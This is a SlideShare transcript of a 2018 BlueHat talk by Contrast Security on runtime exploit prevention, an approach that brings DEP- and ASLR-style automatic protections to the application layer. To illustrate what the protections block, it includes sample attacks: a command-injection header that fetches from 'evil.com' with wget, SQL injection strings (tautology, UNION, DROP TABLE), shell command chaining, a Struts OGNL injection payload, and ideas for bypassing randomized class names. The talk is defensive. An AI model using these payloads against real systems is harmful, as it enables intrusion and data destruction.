Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

BlueHat v18 || Dep for the app layer - time for app sec to grow up

157 views

Published on

Arshan Dabirsiaghi, Contrast Security
Matt Austin, Contrast Security

Nothing in the security industry has moved the needle like Data Execution Prevention and it's sister protections like ASLR.

The availability of secure APIs, the training of developers around the world, and the efforts of security practitioners all produced practically nothing compared to the practical gains produced by DEP, ASLR and other "automatic" protections provided by the tool chain and OS itself.

Where is the equivalent in the Application Layer? Can we use these same techniques and approaches to stop SQL Injection and Deserialization attacks? Can we give developers a "secure stack by default" for any application?

In this talk we'll show you the promising results of our research into this space using binary instrumentation, including the release of free tools that developers can use to protect their applications today from several bug classes, instantly, and without any code changes.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

BlueHat v18 || Dep for the app layer - time for app sec to grow up

  1. 1. 1WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL CONTRASTSECURITY.COM Arshan Dabirsiaghi Chief Scientist | September 26, 2018 DEP FOR THE APP LAYER Time for AppSec to Grow Up BLUEHAT 2018 Matt Austin Director of Security Research
  2. 2. 2WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL WHO ARE WE? Arshan Dabirsiaghi Founder & Chief Scientist Career application security researcher. Credited with many CVEs. Released popular application security tools including AntiSamy and JavaSnoop. Blackhat speaker. Absolutely hates the above picture. Matt Austin Director of Security Research Career application security researcher. Credited with way more CVEs than Arshan. Hall of Fame Bounty Hunter for Facebook, Google. Defcon speaker. Absolutely hates the above picture.
  3. 3. 3WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL TAILORED SECURITY NEVER SCALES: JAVA POLICY
  4. 4. 4WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL TAILORED SECURITY NEVER SCALES: CONTENT SECURITY POLICY From Twitter (source: OWASP CSP CheatSheet)
  5. 5. 5WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL TAILORED SECURITY NEVER SCALES: SELINUX allow staff_usertype unreserved_port_t : udp_socket name_bind ; DT allow staff_usertype unreserved_port_type : tcp_socket name_bind ; [ selinuxuser_tcp_server ] DT allow nsswitch_domain unreserved_port_t : tcp_socket { name_bind name_connect } ; [ nis_enabled ] DT allow nsswitch_domain unreserved_port_t : udp_socket name_bind ; [ nis_enabled ]
  6. 6. 6WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL TAILORED SECURITY NEVER SCALES: THE WAF SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel “@eq 0” “id:9005000, phase:1, pass, t:non, nolog, skipAfter:END=CPANEL” From an actual WAF vendor datasheet!
  7. 7. 7WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL SECURITY GETS BETTER CLOSER TO BOOM Network Firewall Host Firewall IDS + IPS DEP + ASLR WAF ?
  8. 8. 8WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL LET’S TALK ABOUT WHAT WORKS SECURITY MECHANISM STATUS DEP Prevents user-provided cargo code from executing ASLR Prevents the attacker from knowing where their desired code is Stack Cookies Infer the corruption of application integrity Browser Sandbox Raises the cost of exploit development
  9. 9. 9WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL WHERE SHOULD WE INVEST? Developer Training Secure Coding APIs Internal Product Testing Secure Coding Guidelines DEP ASLR SEHOP SafeSEH Why does AppSec only include this? These people-centric activities don’t scale! • Up-front and ongoing cost built on hope • Hope they use • Hope they understand • Hope they catch the bug • Invisible to users • Big up-front cost • Kill bug classes, forever • Invisible to developer and users
  10. 10. 10WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL 10WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL PORTING PROTECTIONS To the Application Layer
  11. 11. 11WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL USING AN AGENT TO ADD SECURITY
  12. 12. 12WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL USING AN AGENT TO ADD SECURITY
  13. 13. 13WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL USING AN AGENT TO ADD SECURITY
  14. 14. 14WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL RUNTIME EXPLOIT PREVENTION (REP) INPUT CLASSIFICATIO N VOLUMETRI C ANALYSIS INPUT TRACING SEMANTIC ANALYSIS HARDENING SANDBOXING Identify clear attacks and prevent processing Reject malformed Identify patterns of input that represent an attack Identify when user input introduces code that will run in an interpreter Detect input causing injection and malicious behavior Enable, improve, configure, enhance, apply During risky behaviors, prevent execution of common exploit paths
  15. 15. 15WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL PROTECTION TYPE 1 INPUT CLASSIFICATION APPLIES TO: Obvious Exploit Attempts HTTP Method Tampering Header Tampering
  16. 16. 16WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL JEFF /widgets HTTP/1.0 Host: foo.com Content-Length: -150 Content-Type: aaaaaaaaaaaaaaa[... 1024 ...] Accept: */*;’ /bin/bash -c wget http://evil.com/ widget=selected_widget Command injection attack -- stop at perimeter PROTECTION TYPE 1 INPUT CLASSIFICATION -150 aaaaaaaaaaaaaaa[... 1024 ...] */*;’ /bin/bash -c wget http://evil.com/ Definitely Invalid Value No Content Type should be longer than 25 characters
  17. 17. 17WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL APPLIES TO: Regex DoS Padding Oracle PROTECTION TYPE 2 VOLUMETRIC ANALYSIS
  18. 18. 18WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL import javax.crypto.Cipher; Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding"); cipher.init(Cipher.DENCRYPT_MODE, key, vi); byte[] encrypted = cipher.doFinal(userInput); // Unhandled when error Padding Oracle PROTECTION TYPE 2 VOLUMETRIC ANALYSIS
  19. 19. 19WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL Hook the exception handler: javax.crypto.BadPaddingException; Track errors (by IP): Block the attacker: Padding Oracle PROTECTION TYPE 2 VOLUMETRIC ANALYSIS 1 3 2
  20. 20. 20WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL PROTECTION TYPE 3 INPUT TRACING APPLIES TO: SQL Injection Expression Language Injection Local File Include … many others Apps and Data Interpreter
  21. 21. 21WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL Username: test@example.com' or 1=1;-- Password: anything... DEP #1: Prevent Cargo Code From Executing PROTECTION TYPE 3 INPUT TRACING string user = Request.Parameters['username'] // build the query cmd.CommandText = "SELECT * FROM USERS where userId='" + username + "'…; … sqlConnection1.Open(); // execute the query reader = cmd.ExecuteReader(); sqlConnection1.Close(); Response.StatusCode = 403; Untrusted Data Received POST /login/ name=test@example.com' or 1=1;-- Injected Query Blocked test@example.com' or 1=1;-- Response Safely Redirected content-type: text/html; charset=UTF-8 status: 403 (forbidden)
  22. 22. 22WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL cmd.ExecuteReader() //cmd.CommandText SELECT * FROM USERS where userId='test@example.com' or 1=1;-- ' and password='anything...' | | |________| | | |________________| |_| | | |_____________________________| | | Table ID | | Literal | op | | Comment Block | | | |_______________________| |_| | Result | | Column = Expression | | | |________________________________| | | Or Expression | | |______________________________________| | WHERE Clause | |__________________________________________________________| SELECT Statement PROTECTION TYPE 3 INPUT TRACING DEP #2: Cargo Code Attempts Execution
  23. 23. 23WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL Untrusted User Input test@example.com' or 1=1;--1 3 2 4 Sink Called cmd.CommandText = "SELECT * FROM USERS where userId='" + user + "'…; Query analyzed (token boundary crossed) SELECT * FROM USERS where userId='test@example.com’ or 1=1;-- ' and password='anything’ 4Block the action! 4 PROTECTION TYPE 3 INPUT TRACING DEP #3: Trigger The Rule
  24. 24. 24WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL PROTECTION TYPE 4 SEMANTIC ANALYSIS APPLIES TO: SQL Injection Command Injection
  25. 25. 25WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL PROTECTION TYPE 4 SEMANTIC ANALYSIS Why Do We Need Semantic Analysis if We Have Input Tracing? Apps and Data 3rd Party Interpreter Another App
  26. 26. 26WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL SQL: Tautology-Based Attacks SELECT * FROM USERS where userId='test@example.com' or 1 <> sqrt(4); | | | |__| |___________| | | | op Tautology | | | | | | | |__________________________________________| | | Or Expression | | |________________________________________________| | WHERE Clause | |____________________________________________________________________| SELECT Statement PROTECTION TYPE 4 SEMANTIC ANALYSIS Can’t do this without pseudo-evaluation!
  27. 27. 27WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL SQL: Union to Unsafe Table SELECT * FROM USERS where userId='test@example.com' UNION SELECT 1 FROM information_schema.tables | |_____________________________| | | |_______________________| | WHERE clause | | | Table Name | |_________________________________________________| | |_____________________________________| SELECT statement | SELECT statement | |___________________________________________| Union statement PROTECTION TYPE 4 SEMANTIC ANALYSIS
  28. 28. 28WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL SELECT * FROM USERS where userId='test@example.com' ; DROP TABLE USERS; | |_____________________________| |_________________| | WHERE Clause | Chained Statement |_________________________________________________| SELECT Statement SQL: Chaining-Based Attacks PROTECTION TYPE 4 SEMANTIC ANALYSIS
  29. 29. 29WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL ping -c 4 $(echo 8.8.8.8`sleep 5`) | | | |_______|| | | | Expansion | | | |______________________| | | Expansion | | |___________________________| | Suffix | |_________________________________| Script ping -c 4 8.8.8.8 ; sleep 5 | |__________| |_| |______| | Suffix | Script |________________| Script Variable Expansion: Command Chaining: Command Injection PROTECTION TYPE 4 SEMANTIC ANALYSIS
  30. 30. 30WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL PROTECTION TYPE 5 HARDENING APPLIES TO: XXE Expression Language Injection
  31. 31. 31WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL java.lang.Runtime JVM Other Code PROTECTION TYPE 5 HARDENING What Does “ASLR” Look Like For an App?
  32. 32. 32WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL java.lang.Runtime JVM Other Code java.lang.$$0x7A69$$Runtime PROTECTION TYPE 5 HARDENING What Does “ASLR” Look Like For an App?
  33. 33. 33WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL java.lang.Runtime JVM Exploit Code PROTECTION TYPE 5 HARDENING Bypassing App “ASLR” #1: Object Graph
  34. 34. 34WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL java.lang.Runtime JVM Exploit Codex java.lang.$$0x7A69$$Runtime PROTECTION TYPE 5 HARDENING Bypassing App “ASLR” #1: Object Graph
  35. 35. 35WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL java.lang.Runtime JVM Exploit Codex java.lang.$$0x7A69$$Runtime java.lang.AnotherJavaType Find a known type that already has a reference to java.lang.Runtime. Use its reference instead of trying to lookup or create your own! PROTECTION TYPE 5 HARDENING Bypassing App “ASLR” #1: Object Graph
  36. 36. 36WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL java.lang.Runtime JVM Exploit Code PROTECTION TYPE 5 HARDENING Bypassing App “ASLR” #2: Lookup By Non-Name Signature
  37. 37. 37WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL java.lang.Runtime JVM Exploit Code java.lang.$$0x7A69$$Runtime x PROTECTION TYPE 5 HARDENING Bypassing App “ASLR” #2: Lookup By Non-Name Signature
  38. 38. 38WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL java.lang.Runtime JVM Exploit Code java.lang.$$0x7A69$$Runtime x java.lang.Instrumentation.getAllLoadedClasses() Loop through every class. Does it have the same number of fields as Runtime? Same types? Same serialVersionUID? Try it! If not, go to the next one! Only 20k classes! PROTECTION TYPE 5 HARDENING Bypassing App “ASLR” #2: Lookup By Non-Name Signature
  39. 39. 39WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL InputStream is = httpRequest.getInputStream(); DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); DocumentBuilder docBuilder = factory.newDocumentBuilder(); doc = docBuilder.parse(is); PROTECTION TYPE 5 HARDENING // BEGIN CONTRAST INJECTION try { factory.setFeature("http://xml.org/sax/features/external-general-entities", false); } catch (Throwable t) { } // END CONTRAST INJECTION Insecure by default! Just-in-Time Security! BOOM!
  40. 40. 40WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL PROTECTION TYPE 6 SANDBOXING APPLIES TO: Expression Language Injection Deserialization .. Many others
  41. 41. 41WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL <untrusted code> Browser Powerful API calls Operating System The cost of exploit development is raised by forcing the attacker to discover sandbox bypasses. SANDBOX PROTECTION TYPE 5 SANDBOXING Browser (Application) Sandbox
  42. 42. 42WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL OGNL Runtime x JVM Struts CVE-2018-1176 – OGNL Injection PROTECTION TYPE 6 SANDBOXING
  43. 43. 43WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL GET /struts2-showcase /${( _memberAccess[“allowStaticMethodAccess”]=true, #a=@java.lang.Runtime@getRuntime().exec(‘id’)... )} /actionChain1.action HTTP/1.0 Struts CVE-2018-11776 – OGNL Injection PROTECTION TYPE 6 SANDBOXING
  44. 44. 44WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL com.opensymphony.xwork2.ActionProxy.getMethod() ... ↳ognl.Ognl.getValue(Ognl.java) ↳ognl.OgnlUtil.compileAndExecute(OgnlUtil.java:405) ↳ ... ↳java.lang.Runtime.exec(Runtime.java:152) Source Start “sandbox” Blocked method Struts CVE-2018-11776 – OGNL Injection PROTECTION TYPE 6 SANDBOXING
  45. 45. 45WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL COMBINING 3 PROTECTION STRATEGIES ON OGNL INJECTION 45 INPUT CLASSIFICATIO N VOLUMETRI C ANALYSIS INPUT TRACING SEMANTIC ANALYSIS HARDENING SANDBOXING Identify obvious OGNL in request and block Identify input that could possibly be OGNL from the input and check if it made it to the OGNL API and is about to be evaluated Prevent common exploit paths from working if within OGNL evaluation
  46. 46. 47WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL GOALS OF RUNTIME EXPLOIT PREVENTION (REP) • SQL Injection • Padding Oracle • XML External Entity (XXE) • … KILL BUG CLASSES • Practically no performance overhead BE INVISIBLE TO END USERS • No code changes or rule tuning BE INVISIBLE TO DEVELOPERS
  47. 47. 48WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL 48WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL CONCLUSIONS
  48. 48. 49WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL DEP (+ ASLR etc) REP Inject into app runtime as an agent Aim to prevent many unique exploitation conditions in many different interpreters Weave around high level APIs from the runtime, OSS and commercial packages Inject by OS and compiler Aim to prevent EIP=attacker_controlled (1 interpreter, the CPU) Weave around meta- programming points IN SUMMARY
  49. 49. 50WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL HOW DO WE GET THERE? .NET Ecosystem Microsoft 1. Request Processing API 2. SQL API 3. XML API RUNTIME AGENT Node.js Ecosystem express (OSS) • Request Processing API knex.js (OSS) • SQL API xml-parser (OSS) • XML API RUNTIME AGENT
  50. 50. 51WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL CONTRAST COMMUNITY EDITION 16M DEVELOPERS IN THE WORLD ONLY 6% HAVE ACCESS TO DECENT SECURITY TOOLS Totally free and full-strength application security platform: • Assess web apps and APIs for vulnerabilities • Monitor open source • Runtime exploit prevention Faster, more accurate, more scalable, better integrated, and more DevSecOps-friendly than any other application security solution. Coming Soon: Integrations:
  51. 51. 52WELCOME TO THE ERA OF SELF-PROTECTING SOFTWARE | CONTRASTSECURITY.COM © 2018 CONFIDENTIAL THANK YOU Arshan Dabirsiaghi | arshan.dabirsiaghi@contrastsecurity.com Matt Austin | matt.austin@contrastsecurity.com

×